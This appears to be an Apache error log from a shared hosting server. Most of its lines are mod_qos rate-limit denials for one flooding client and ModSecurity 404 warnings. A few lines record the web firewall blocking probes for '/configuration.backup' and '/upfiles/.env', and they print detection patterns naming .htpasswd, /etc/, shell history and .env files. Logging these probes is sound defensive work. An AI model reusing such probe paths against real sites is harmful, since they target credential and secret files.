[Tue May 26 19:54:03.516633 2026] [security2:error] [pid 93868:tid 94288] [client 185.177.72.53:63430] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/configuration.backup"] [unique_id "ahWtA0qK9k_ZUB2Vp25GAwAAAa0"]
[Tue May 26 19:54:03.588141 2026] [qos:error] [pid 86490:tid 86717] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6K0KAAAAOY
[Tue May 26 19:54:03.589903 2026] [qos:error] [pid 86490:tid 86666] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtA1ZMwN0DpLVWo6K0KQAAALM
[Tue May 26 19:54:03.593816 2026] [qos:error] [pid 86490:tid 86695] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6K0KgAAANA
[Tue May 26 19:54:03.595860 2026] [qos:error] [pid 86490:tid 86735] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6K0KwAAAPg
[Tue May 26 19:54:03.596477 2026] [qos:error] [pid 86490:tid 86679] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6K0LAAAAMA
[Tue May 26 19:54:03.598519 2026] [qos:error] [pid 86490:tid 86675] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6K0LQAAALw
[Tue May 26 19:54:03.598558 2026] [qos:error] [pid 93576:tid 93785] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtA2DRMqfxdEDkoszNCgAAAEk
[Tue May 26 19:54:03.599186 2026] [qos:error] [pid 86490:tid 86675] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6K0LgAAALw
[Tue May 26 19:54:03.613885 2026] [qos:error] [pid 86490:tid 86646] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6K0MgAAAJ8
[Tue May 26 19:54:03.614679 2026] [qos:error] [pid 86490:tid 86663] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6K0MwAAALA
[Tue May 26 19:54:03.738087 2026] [qos:error] [pid 86490:tid 86648] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6K0NwAAAKE
[Tue May 26 19:54:03.742941 2026] [qos:error] [pid 86490:tid 86633] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6K0OAAAAJI
[Tue May 26 19:54:03.745195 2026] [qos:error] [pid 86490:tid 86713] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6K0OQAAAOI
[Tue May 26 19:54:03.746362 2026] [qos:error] [pid 86490:tid 86672] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6K0OgAAALk
[Tue May 26 19:54:03.746688 2026] [qos:error] [pid 86490:tid 86676] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6K0OwAAAL0
[Tue May 26 19:54:03.751611 2026] [qos:error] [pid 86490:tid 86641] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6K0PAAAAJo
[Tue May 26 19:54:03.751891 2026] [qos:error] [pid 86490:tid 86739] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6K0PQAAAPw
[Tue May 26 19:54:03.752018 2026] [qos:error] [pid 93576:tid 93839] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA2DRMqfxdEDkoszNCwAAAH8
[Tue May 26 19:54:03.764667 2026] [qos:error] [pid 86490:tid 86702] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6K0PgAAANc
[Tue May 26 19:54:03.771137 2026] [qos:error] [pid 86490:tid 86678] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6K0PwAAAL8
[Tue May 26 19:54:03.889559 2026] [qos:error] [pid 86490:tid 86699] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6K0QwAAANQ
[Tue May 26 19:54:03.892070 2026] [qos:error] [pid 86490:tid 86745] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6K0RAAAAQI
[Tue May 26 19:54:03.894968 2026] [qos:error] [pid 86490:tid 86698] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6K0RQAAANM
[Tue May 26 19:54:03.895679 2026] [qos:error] [pid 86490:tid 86661] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6K0RgAAAK4
[Tue May 26 19:54:03.900575 2026] [qos:error] [pid 86490:tid 86747] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6K0RwAAAQQ
[Tue May 26 19:54:03.905535 2026] [qos:error] [pid 86490:tid 86664] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6K0SAAAALE
[Tue May 26 19:54:03.906514 2026] [qos:error] [pid 93576:tid 93763] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA2DRMqfxdEDkoszNDAAAADM
[Tue May 26 19:54:03.908863 2026] [qos:error] [pid 86490:tid 86632] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6K0SQAAAJE
[Tue May 26 19:54:03.915152 2026] [qos:error] [pid 86490:tid 86718] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6K0SwAAAOc
[Tue May 26 19:54:03.925389 2026] [qos:error] [pid 86490:tid 86666] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtA1ZMwN0DpLVWo6K0TQAAALM
[Tue May 26 19:54:04.039785 2026] [qos:error] [pid 86490:tid 86654] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBFZMwN0DpLVWo6K0TgAAAKc
[Tue May 26 19:54:04.044327 2026] [qos:error] [pid 86490:tid 86640] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBFZMwN0DpLVWo6K0TwAAAJk
[Tue May 26 19:54:04.045547 2026] [qos:error] [pid 86490:tid 86624] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBFZMwN0DpLVWo6K0UAAAAIk
[Tue May 26 19:54:04.045674 2026] [qos:error] [pid 86490:tid 86695] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBFZMwN0DpLVWo6K0UQAAANA
[Tue May 26 19:54:04.054670 2026] [qos:error] [pid 86490:tid 86735] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBFZMwN0DpLVWo6K0UgAAAPg
[Tue May 26 19:54:04.059335 2026] [qos:error] [pid 86490:tid 86656] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBFZMwN0DpLVWo6K0UwAAAKk
[Tue May 26 19:54:04.059522 2026] [qos:error] [pid 86490:tid 86679] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBFZMwN0DpLVWo6K0VAAAAMA
[Tue May 26 19:54:04.060398 2026] [qos:error] [pid 93576:tid 93788] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBGDRMqfxdEDkoszNDQAAAEw
[Tue May 26 19:54:04.066978 2026] [qos:error] [pid 86490:tid 86685] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBFZMwN0DpLVWo6K0VQAAAMY
[Tue May 26 19:54:04.079449 2026] [qos:error] [pid 86490:tid 86675] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBFZMwN0DpLVWo6K0VgAAALw
[Tue May 26 19:54:04.189513 2026] [qos:error] [pid 86490:tid 86635] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBFZMwN0DpLVWo6K0WQAAAJQ
[Tue May 26 19:54:04.192459 2026] [qos:error] [pid 86490:tid 86708] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBFZMwN0DpLVWo6K0WgAAAN0
[Tue May 26 19:54:04.194994 2026] [qos:error] [pid 86490:tid 86652] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBFZMwN0DpLVWo6K0WwAAAKU
[Tue May 26 19:54:04.195885 2026] [qos:error] [pid 86490:tid 86682] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBFZMwN0DpLVWo6K0XAAAAMM
[Tue May 26 19:54:04.207263 2026] [qos:error] [pid 86490:tid 86660] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBFZMwN0DpLVWo6K0XQAAAK0
[Tue May 26 19:54:04.212275 2026] [qos:error] [pid 86490:tid 86651] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBFZMwN0DpLVWo6K0XgAAAKQ
[Tue May 26 19:54:04.212979 2026] [qos:error] [pid 86490:tid 86651] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBFZMwN0DpLVWo6K0XwAAAKQ
[Tue May 26 19:54:04.215570 2026] [qos:error] [pid 93576:tid 93781] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBGDRMqfxdEDkoszNDgAAAEU
[Tue May 26 19:54:04.217120 2026] [qos:error] [pid 86490:tid 86732] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBFZMwN0DpLVWo6K0YAAAAPU
[Tue May 26 19:54:04.233521 2026] [qos:error] [pid 86490:tid 86713] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBFZMwN0DpLVWo6K0YQAAAOI
[Tue May 26 19:54:04.285139 2026] [security2:error] [pid 93868:tid 94339] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAkqK9k_ZUB2Vp25F1wAAAeA"]
[Tue May 26 19:54:04.288006 2026] [security2:error] [pid 93867:tid 94214] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtApCDfrjqoHpuuBKstAAAAXk"]
[Tue May 26 19:54:04.292416 2026] [security2:error] [pid 93867:tid 94106] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtApCDfrjqoHpuuBKssgAAAUg"]
[Tue May 26 19:54:04.294461 2026] [security2:error] [pid 93868:tid 94266] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAkqK9k_ZUB2Vp25F4gAAAZc"]
[Tue May 26 19:54:04.305689 2026] [security2:error] [pid 86490:tid 86643] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAlZMwN0DpLVWo6KzrgAAAJw"]
[Tue May 26 19:54:04.319616 2026] [security2:error] [pid 93867:tid 94020] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtApCDfrjqoHpuuBKsrgAAARA"]
[Tue May 26 19:54:04.332533 2026] [security2:error] [pid 93868:tid 94337] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtA0qK9k_ZUB2Vp25F8wAAAd4"]
[Tue May 26 19:54:04.336252 2026] [security2:error] [pid 86490:tid 86702] [client 185.177.72.53:34666] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/upfiles/.env"] [unique_id "ahWtBFZMwN0DpLVWo6K0ZAAAANc"]
[Tue May 26 19:54:04.338036 2026] [security2:error] [pid 93867:tid 94040] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtApCDfrjqoHpuuBKstgAAASQ"]
[Tue May 26 19:54:04.350100 2026] [security2:error] [pid 93867:tid 94145] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtApCDfrjqoHpuuBKssQAAAVo"]
[Tue May 26 19:54:04.356279 2026] [security2:error] [pid 93867:tid 94216] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtA5CDfrjqoHpuuBKsvQAAAXo"]
[Tue May 26 19:54:04.373327 2026] [security2:error] [pid 86490:tid 86631] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAlZMwN0DpLVWo6KzrQAAAJA"]
[Tue May 26 19:54:04.381438 2026] [security2:error] [pid 93868:tid 94258] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtA0qK9k_ZUB2Vp25F8gAAAY8"]
[Tue May 26 19:54:04.382929 2026] [security2:error] [pid 86490:tid 86662] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAlZMwN0DpLVWo6KzsQAAAK8"]
[Tue May 26 19:54:04.383483 2026] [security2:error] [pid 93867:tid 94104] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtA5CDfrjqoHpuuBKswgAAAUc"]
[Tue May 26 19:54:04.391896 2026] [security2:error] [pid 86490:tid 86684] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtA1ZMwN0DpLVWo6K0CQAAAMU"]
[Tue May 26 19:54:04.398432 2026] [security2:error] [pid 93868:tid 94359] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtA0qK9k_ZUB2Vp25F9QAAAfQ"]
[Tue May 26 19:54:04.398901 2026] [security2:error] [pid 93868:tid 94340] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAkqK9k_ZUB2Vp25F5wAAAeE"]
[Tue May 26 19:54:04.405302 2026] [security2:error] [pid 86490:tid 86730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAlZMwN0DpLVWo6KzwwAAAPM"]
[Tue May 26 19:54:04.407109 2026] [security2:error] [pid 86490:tid 86637] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAlZMwN0DpLVWo6KzuwAAAJY"]
[Tue May 26 19:54:04.410225 2026] [security2:error] [pid 93868:tid 94322] [client 114.119.156.126:35477] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahWtBEqK9k_ZUB2Vp25GGwAAAc8"], referer: http://haddingtonwines.com/cart?remove_item=ef41d488755367316f04fc0e0e9dc9fc
[Tue May 26 19:54:04.411771 2026] [security2:error] [pid 86490:tid 86725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAlZMwN0DpLVWo6KzsAAAAO4"]
[Tue May 26 19:54:04.428465 2026] [security2:error] [pid 86490:tid 86642] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAlZMwN0DpLVWo6KzwAAAAJs"]
[Tue May 26 19:54:04.428972 2026] [security2:error] [pid 93576:tid 93829] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAmDRMqfxdEDkoszM-wAAAHU"]
[Tue May 26 19:54:04.432956 2026] [security2:error] [pid 86490:tid 86620] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtA1ZMwN0DpLVWo6K0AgAAAIU"]
[Tue May 26 19:54:04.432961 2026] [security2:error] [pid 86490:tid 86626] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtA1ZMwN0DpLVWo6K0BAAAAIs"]
[Tue May 26 19:54:04.436591 2026] [security2:error] [pid 93868:tid 94319] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtA0qK9k_ZUB2Vp25F9AAAAcw"]
[Tue May 26 19:54:04.455339 2026] [security2:error] [pid 86490:tid 86689] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAlZMwN0DpLVWo6KzwgAAAMo"]
[Tue May 26 19:54:04.460166 2026] [security2:error] [pid 86490:tid 86680] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtAlZMwN0DpLVWo6KzvwAAAME"]
[Tue May 26 19:54:04.562442 2026] [qos:error] [pid 86490:tid 86664] [client 45.148.10.120:34912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBFZMwN0DpLVWo6K0iAAAALE
[Tue May 26 19:54:04.563194 2026] [qos:error] [pid 93868:tid 94271] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtBEqK9k_ZUB2Vp25GKAAAAZw
[Tue May 26 19:54:04.568437 2026] [qos:error] [pid 93867:tid 94046] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtBJCDfrjqoHpuuBKs8gAAASo
[Tue May 26 19:54:04.570094 2026] [qos:error] [pid 93868:tid 94308] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtBEqK9k_ZUB2Vp25GKQAAAcE
[Tue May 26 19:54:04.585369 2026] [qos:error] [pid 86490:tid 86624] [client 45.148.10.120:34806] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBFZMwN0DpLVWo6K0iwAAAIk
[Tue May 26 19:54:04.585551 2026] [qos:error] [pid 86490:tid 86733] [client 45.148.10.120:34834] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBFZMwN0DpLVWo6K0jAAAAPY
[Tue May 26 19:54:04.594416 2026] [qos:error] [pid 93868:tid 94259] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtBEqK9k_ZUB2Vp25GLAAAAZA
[Tue May 26 19:54:04.597535 2026] [qos:error] [pid 86490:tid 86656] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBFZMwN0DpLVWo6K0jgAAAKk
[Tue May 26 19:54:04.605675 2026] [qos:error] [pid 86490:tid 86704] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBFZMwN0DpLVWo6K0jwAAANk
[Tue May 26 19:54:04.613086 2026] [qos:error] [pid 86490:tid 86724] [client 45.148.10.120:35122] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBFZMwN0DpLVWo6K0kAAAAO0
